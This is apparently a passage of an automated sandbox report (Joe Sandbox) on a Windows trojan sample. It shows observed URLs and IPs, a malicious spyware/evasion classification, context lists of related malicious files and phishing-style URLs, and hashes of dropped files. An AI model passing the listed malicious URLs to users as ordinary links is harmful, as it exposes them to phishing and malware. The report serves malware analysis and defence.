http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	MpSigStub.exe, 00000013.00000003.18752568256.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.oaticerts.com/repository.	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ancert.com/cps0	CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.accv.es0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80605	svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976530622.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.mV	MpSigStub.exe, 00000013.00000003.18808585691.000001F8CEA95000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18809059455.000001F8CEAA7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80604	svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0	CasPol.exe, 00000005.00000003.18602156620.0000000020831000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.echoworx.com/ca/root2/cps.pdf0	CasPol.exe, 00000005.00000002.23256187565.0000000020822000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rca.e-szigno.hu/ocsp0-	CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://eca.hinet.net/repository/CRL2/CA.crl0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.datev.de/zertifikat-policy-std0	CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18602156620.0000000020831000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mail.asfaltolargo.pt	CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/Prod/C:	edb.log.4.dr	false		high
http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0	CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.defence.gov.au/pki0	CasPol.exe, 00000005.00000003.18602156620.0000000020831000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.agesic.gub.uy/acrn/cps_acrn.pdf0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.catcert.net/verarrel05	CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pki.gva.es/cps0%	CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.cert.fnmt.es/dpcs/0	CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682296383.0000000020824000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.datev.de/zertifikat-policy-bt0	CasPol.exe, 00000005.00000003.18600919578.0000000020866000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601190951.000000002072C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.comsign.co.il/cps0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:HTTP/1.1	CasPol.exe, 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.23.110	unknown	United States	15169	GOOGLEUS	false
94.46.30.74	unknown	Portugal	24768	ALMOUROLTECPT	false
142.251.37.97	unknown	United States	15169	GOOGLEUS	false
209.197.3.8	unknown	United States	20446	HIGHWINDS3US	false
20.189.173.22	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.11.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	634670
Start date and time: 26/05/202216:44:19	2022-05-26 16:44:19 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 19m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/253@0/7
EGA Information:	Successful, ratio: 83.3%
HDC Information:	Successful, ratio: 78.3% (good quality ratio 64%) Quality average: 59.6% Quality standard deviation: 36.8%
HCA Information:	Successful, ratio: 84% Number of executed functions: 132 Number of non-executed functions: 155
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
Execution Graph export aborted for target mpam-60574f34.exe, PID 2156 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:46:20	API Interceptor	2x Sleep call for process: svchost.exe modified
16:46:43	API Interceptor	2805x Sleep call for process: CasPol.exe modified
16:47:15	API Interceptor	1x Sleep call for process: MpSigStub.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
94.46.30.74	SecuriteInfo.com.Trojan.Siggen17.53056.4682.exe	Get hash	malicious	Browse
94.46.30.74	SOLICITUD DE OFERTA.exe	Get hash	malicious	Browse
209.197.3.8	DOC-58686014798.xls	Get hash	malicious	Browse
	DETAILS-809816165.xls	Get hash	malicious	Browse
	http://track.smtpsendemail.com/9087831/c?p=UnMkS5R2wdYrN3R78cvTYWLQY9Tb74OJ3_yGbsPgZ6Tcr-8zCwtw18elCx3VuRGbfEbv8LI96t7CtimgQqdEXIz8iEi9G2bYxDr2ltyLu1oGGYbSdvSMzioyr-jpNJzaLMBx0L-spfhcqjdnXcbpAy-RNuM0Fatr5jUgws92Nu8m5LfoKJy2nGmylc74BOYp-FB5CmZuPzA9YyroL6_2Kioq9jiMufGWZKqp1Ur1keruOD53lDmk10eg4GvaJDmHMmPVG0DPaYSmi-LgJMe3jX_8hQHIG295AI-eVq4yPf0SZekiNYuGxN-cv3FrZ4Sv	Get hash	malicious	Browse
	https://www.canva.com/design/DAFAfWuuKsQ/TMiug0pNQ963cTDgD5NJRw/view?utm_content=DAFAfWuuKsQ&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	Browse
	Colpal.zip	Get hash	malicious	Browse
	https://wp20.ru/r281927239/	Get hash	malicious	Browse
	http://drcedirct.com	Get hash	malicious	Browse
	CNN5416020333830776_202203151245.xlsm	Get hash	malicious	Browse
	Form - Feb 25, 2022.zip	Get hash	malicious	Browse
	MicrosoftEdgeWebview2Setup.exe	Get hash	malicious	Browse
20.189.173.22	industroyer2.exe	Get hash	malicious	Browse
	OyLImUdEwH.exe	Get hash	malicious	Browse
	vEGo6oLyrT.exe	Get hash	malicious	Browse
	84B3387D512191B0764FDE9A03D827CB42FFE33D864B1.exe	Get hash	malicious	Browse
	wqD6sNBFwm.exe	Get hash	malicious	Browse
	3FB154482EF8AE49941C9ED13063294CD4F97E28E5DD8.exe	Get hash	malicious	Browse
	73E25CED557E8008074958707573A4D6AD68E3861D04A.exe	Get hash	malicious	Browse
	3964A1E13D2B3EE0C3C34B50D4785907C3FFD560DC3E4.exe	Get hash	malicious	Browse
	lxLsGA9J7t.exe	Get hash	malicious	Browse
	0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Get hash	malicious	Browse
	6VTSHr3nIo.exe	Get hash	malicious	Browse
	C7304FF0966068D305DA031F9DA60C5B0EBE32AC43533.exe	Get hash	malicious	Browse
	7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exe	Get hash	malicious	Browse
	23062BA932165210EBB3FFCD15474E79F19E6AD74869F.exe	Get hash	malicious	Browse
	E1917F133B3838845A0611AE4E9AC5DB1479461C18644.exe	Get hash	malicious	Browse
	6ZYg7h0ynL.exe	Get hash	malicious	Browse
	fXlJhe5OGb.exe	Get hash	malicious	Browse
	DCF4ECC6D3B70A3E11077862B9E3830806191F0718EEC.exe	Get hash	malicious	Browse
	CB7D321954760DE22CCBF59ECE43D94E503350B18203D.exe	Get hash	malicious	Browse
	HxV2jjWxxh.exe	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HIGHWINDS3US	http://maddox.xmission.com	Get hash	malicious	Browse	69.16.175.42
	bia.govMay 23, 2022.html	Get hash	malicious	Browse	69.16.175.42
	Lettre_virement.html	Get hash	malicious	Browse	69.16.175.42
	https://dev-dashboardteam.pantheonsite.io/wp-content/uploads/2022/05/index.html#tes.test.com	Get hash	malicious	Browse	69.16.175.10
	Bia.html	Get hash	malicious	Browse	69.16.175.42
	RFQ-Order List.exe	Get hash	malicious	Browse	151.139.128.11
	https://pastebin.com/0R2zQdaU	Get hash	malicious	Browse	205.185.208.79
	joanne.hardcastle@cht.nhs.uk.pdf.htm	Get hash	malicious	Browse	69.16.175.10
	PO087-Uhhgyauag98-Ybsysgbuygayuu.htm	Get hash	malicious	Browse	69.16.175.10
	https://onedrive.live.com/view.aspx?resid=EC23EBA1EBBB690F!214&authkey=!AAFZAi9qJZO9jGY	Get hash	malicious	Browse	69.16.175.10
	http://jgcro.smtpclick.com/tracking/qaR9ZGLmAmt5BGt2ZwZkAGx2AwD2APM5qzS4qaR9ZQbjHN	Get hash	malicious	Browse	69.16.175.42
	DOC-58686014798.xls	Get hash	malicious	Browse	209.197.3.8
	DETAILS-809816165.xls	Get hash	malicious	Browse	209.197.3.8
	https://bit.ly/addyoursitehere	Get hash	malicious	Browse	151.139.128.11
	http://track.smtpsendemail.com/9087831/c?p=UnMkS5R2wdYrN3R78cvTYWLQY9Tb74OJ3_yGbsPgZ6Tcr-8zCwtw18elCx3VuRGbfEbv8LI96t7CtimgQqdEXIz8iEi9G2bYxDr2ltyLu1oGGYbSdvSMzioyr-jpNJzaLMBx0L-spfhcqjdnXcbpAy-RNuM0Fatr5jUgws92Nu8m5LfoKJy2nGmylc74BOYp-FB5CmZuPzA9YyroL6_2Kioq9jiMufGWZKqp1Ur1keruOD53lDmk10eg4GvaJDmHMmPVG0DPaYSmi-LgJMe3jX_8hQHIG295AI-eVq4yPf0SZekiNYuGxN-cv3FrZ4Sv	Get hash	malicious	Browse	209.197.3.8
	http://track.smtpsendemail.com/9087831/c?p=UnMkS5R2wdYrN3R78cvTYWLQY9Tb74OJ3_yGbsPgZ6Tcr-8zCwtw18elCx3VuRGbfEbv8LI96t7CtimgQqdEXIz8iEi9G2bYxDr2ltyLu1oGGYbSdvSMzioyr-jpNJzaLMBx0L-spfhcqjdnXcbpAy-RNuM0Fatr5jUgws92Nu8m5LfoKJy2nGmylc74BOYp-FB5CmZuPzA9YyroL6_2Kioq9jiMufGWZKqp1Ur1keruOD53lDmk10eg4GvaJDmHMmPVG0DPaYSmi-LgJMe3jX_8hQHIG295AI-eVq4yPf0SZekiNYuGxN-cv3FrZ4Sv	Get hash	malicious	Browse	69.16.175.42
	http://sabc34b51fc89.qpostie18.com/track/click/SlC9WvG0zfqQGsSFnu0XcZxJnmM/1/aHR0cHM6Ly9jbGF0aWQuaW8vd2ViaW5hci9kb2wtZmxzYS1pbi0yMDIyLXRoZS1vdmVydGltZS10aHJlc2hvbGQtYW5kLWVtcGxveWVycy1idWRnZXQ=/	Get hash	malicious	Browse	69.16.175.42
	http://www.insidemackinac.com	Get hash	malicious	Browse	151.139.128.11
	http://15u30P6pz0M18W5vt.cam	Get hash	malicious	Browse	205.185.208.79
	https://gusty-legal-49c.notion.site/ALEXANDRINE-Murielle-vous-a-donn-acc-s-un-document-s-curis-e6cb364f5c694f18886d3c64a9da56b2	Get hash	malicious	Browse	69.16.175.10
ALMOUROLTECPT	SecuriteInfo.com.W32.AIDetectNet.01.24324.exe	Get hash	malicious	Browse	94.46.22.30
	SecuriteInfo.com.W32.AIDetectNet.01.4805.exe	Get hash	malicious	Browse	94.46.22.30
	http://gflpiu.support.lasermax.co.ke./#.aHR0cHM6Ly9nZmxwaXUubWljcm8tc2VjdXJpdHkudGlhZ29yb2NoYXV0by5wdCNhaGVyZ2VydEBnay1zb2Z0d2FyZS5jb20=	Get hash	malicious	Browse	94.46.168.100
	New Vendor Registration.xlsx	Get hash	malicious	Browse	94.46.22.122
	https://nof.pt	Get hash	malicious	Browse	94.46.167.155
	SecuriteInfo.com.Trojan.Siggen17.53056.4682.exe	Get hash	malicious	Browse	94.46.30.74
	RFQ Reference No EU2022-0064.exe	Get hash	malicious	Browse	94.46.15.229
	SOLICITUD DE OFERTA.exe	Get hash	malicious	Browse	94.46.30.74
	ORDER SV-033764.exe	Get hash	malicious	Browse	94.46.15.160
	SecuriteInfo.com.W32.AIDetectNet.01.19723.exe	Get hash	malicious	Browse	130.185.84.152
	SecuriteInfo.com.W32.AIDetectNet.01.17159.exe	Get hash	malicious	Browse	130.185.84.152
	DHL Shipping documents.xlsx	Get hash	malicious	Browse	94.46.173.92
	evfGvgdlA7.exe	Get hash	malicious	Browse	94.46.173.92
	DHL Receipt_AWB2045829822.xlsx	Get hash	malicious	Browse	94.46.173.92
	Shipment Documents.xlsx	Get hash	malicious	Browse	94.46.173.92
	BuFulO5YOI	Get hash	malicious	Browse	94.46.31.166
	Quotation#QO210421A87356_pdf.exe	Get hash	malicious	Browse	94.46.176.210
	NewPurchaseOrder.exe	Get hash	malicious	Browse	94.46.170.205
	PurchaseOrderBKKR088891-pdf.exe	Get hash	malicious	Browse	94.46.170.205
	DHLinvoiceBKKR0057891.exe	Get hash	malicious	Browse	94.46.170.205

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe	SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Gen.Variant.Nemesis.7115.16481.exe	Get hash	malicious	Browse
	cinchonate.exe	Get hash	malicious	Browse
	cinchonate.exe	Get hash	malicious	Browse
	DHL RECEIPT AWB2036472836.xlsx	Get hash	malicious	Browse
	72rPHMzujO.exe	Get hash	malicious	Browse
	mic(1).exe	Get hash	malicious	Browse
	72rPHMzujO.exe	Get hash	malicious	Browse
	mic(1).exe	Get hash	malicious	Browse
	SWIFT.xlsx	Get hash	malicious	Browse
	bena.exe	Get hash	malicious	Browse
	payment_34662.exe	Get hash	malicious	Browse
	bena.exe	Get hash	malicious	Browse
	payment_34662.exe	Get hash	malicious	Browse
	PO DP526-025840 & PO DP526-025841.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.36462066590313524
Encrypted:	false
SSDEEP:	12:hu77eaaD0JcaaD0JwQQv7u77eaaD0JcaaD0JwQQv:hu77etgJctgJwn7u77etgJctgJwn
MD5:	72C73518694031F3E9CA1BA887CBAF3A
SHA1:	68D3E3605779412D038017B2F2AD2D0297DE82B7
SHA-256:	798EC47E6718B444DDE82A405DAB96E750F8839A0FA4B980B69D1C456C307B2F
SHA-512:	70A13B83E2FFB91EBED531A8E3694732008F15E1CC82CC0B874F9CB6D1F2B6DAC004803CDCA4D3B1D667EA7019BBA6B3DD31DE6D26DF0C466BAB162627CA6F0D
Malicious:	false
Preview:	..U...........5.......).*9...y..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................5.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.411603014286152
Encrypted:	false
SSDEEP:	3072:PJyugY9cTJm58j7cX7g1wbyECkTGth8Y4P49+FmFYVpwDpJHuUl:ED4m
MD5:	A510A4E812F12E5ADBD43E4CC6EA307E
SHA1:	379C9BDA2D6AB38CA6C0F2DE2CEFDB7836875579
SHA-256:	44CDCD47881E77D70FE3C66435BA6379FADBF2BC0E8C04020A567ADAE9BD0C9E
SHA-512:	1B4010C8DB7234FA67C26ADBE97F5BD5083BC1085CED37939501513434DC22801AA4DA5C8A566E86F6FBF1F2B2C70F90BF69B1B1D832D2AB2062165FA08A63FE
Malicious:	false
Preview:	;g..........@..@....yo.9...y..........<.....).9...y..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................;............a..hd..#.........`h.................h.<.......:......p..9...y..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x4a9d9835, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6946944573199703
Encrypted:	false
SSDEEP:	1536:zSB2qSB2gSjlK/vfS+NEh2ZhV88/bGLBSBLil23/3n8n/3A5v7GoCnLKxKHKr0Gt:zapaCK0DfOD8F31Xw
MD5:	BF8326B8CD8E193D830B09383486BF41
SHA1:	224E92699640C7D156AA96E5CA0CDF2FA3835620
SHA-256:	163325BF63D764E53575061F4582E7FB929F009C30381E2999F5BA541F3F89A6
SHA-512:	C0B64CFC193CBA3B875C765631F831D70AA6B6333B055557568C3985C1D67066C1AFB0BEF7B81197E90778A9D5445F07C6DB962DC3D1684CCE0482F9BE89E4AE
Malicious:	false
Preview:	J..5... .......\........p..9...y......................6.4.....70...z.......z..h.3.....70...z..6.4...........).9...y..........................................................................................................bJ......n....@...................................................................................................... ...................................................................................................................................................................................................................................................I./.70...z..................6l.j70...z...........................#......6.4.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07826128739789665
Encrypted:	false
SSDEEP:	3:kul2cprRqvSagxqCvQW6uRllTOE5xtlllJlbxvws:kq9MvSagxqCvQjQpOE5J
MD5:	3531E7FAF8F35B23655FD4748988C379
SHA1:	5FA66B3BCF43126A8EBB064525CF61DDBDCEB1EA
SHA-256:	0752112651925BCB68D2B674E87601BDA01262B4F64E0EB164C67B13886C707B
SHA-512:	F3CD94F36C3F93747434B3E033ACF8791F402ACC368588BC62503E70A7D5194E9347ECFFF52854C5CC1BB07FB59041C99C643313C039F9AF686AA0C174D5747D
Malicious:	false
Preview:	.-x.....................................*9...y.......z..70...z..........70...z..70...z.....60...z..................6l.j70...z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AE3.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8020
Entropy (8bit):	3.706257493240483
Encrypted:	false
SSDEEP:	192:R9l7lZNiApxD6YkqiugmfqrAzTp11imfIEAHm:R9lnNimxD6YZTgmfsAj1TfIE9
MD5:	4F11F9210B61101E3201E072338341AA
SHA1:	47F5229ADB85964F18CC84931A8132C3ABC128C9
SHA-256:	58FAF8253A9013B2FC1EEAA23995BBE48CFC915BDD72976714EE7E4AC11B6966
SHA-512:	B737D5E5DCBA4CBEF7C0A30667F2F01275D65169F8AA65D92D66E3DA68EEC4C816A47B265938FDB7826A013A83B610D118543651983E70EB6293E2760381E52C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.9.0.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BDE.tmp.xml

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4887
Entropy (8bit):	4.536670258763977
Encrypted:	false
SSDEEP:	96:uINfX7y8ySPf17JFKMxtb2iW/xtbdu+aTBd:uIJy8ySXHdxtWxtRCT/
MD5:	88469B220C15534AF3FA48C07BA4E6E9
SHA1:	A8C095C8CE2CDF7B338C975B8E46C45288F9C466
SHA-256:	44E18775A34CC9D803FA446EB44F299F667CA032E9FA86A99C6DB5BD198C24C8
SHA-512:	1924D2B50102CDB138F1C7C5977FFE4F61E464CC3E9DECCE1007346E4E528BE84D09E30BF7E1CF5F2229957AA2B8F2C35C261C63B7C0DD7740F439C5EC2AE7E4
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="221631509" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C1C.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	60346
Entropy (8bit):	3.0516963968700885
Encrypted:	false
SSDEEP:	1536:Drszt4VjYp2rcgzEdjaeKE8vFETndMpjaq4Vf:Drszt4VjYp2rcgzEdjaeKEGFETndMpjw
MD5:	0AC1B92281A819542DDFF246DF86F6EE
SHA1:	9E771F3FDF5147D34737A82CB4BA7299D7C0DF3F
